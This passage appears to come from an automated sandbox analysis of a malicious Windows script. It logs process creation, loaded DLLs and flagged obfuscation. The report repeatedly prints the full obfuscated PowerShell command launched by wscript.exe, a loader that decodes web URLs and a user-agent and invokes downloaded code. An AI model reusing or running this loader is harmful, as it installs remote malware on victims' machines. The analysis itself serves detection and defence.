Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: e.pdb source: powershell.exe, 00000001.00000002.3347718533.0000029A4F9B0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.3370987794.0000029A6800E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32& source: powershell.exe, 00000001.00000002.3370987794.0000029A6800E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbtp source: powershell.exe, 00000001.00000002.3347718533.0000029A4F9B0000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 N", "0")
      Obfuscated command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
      Suspicious powershell command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 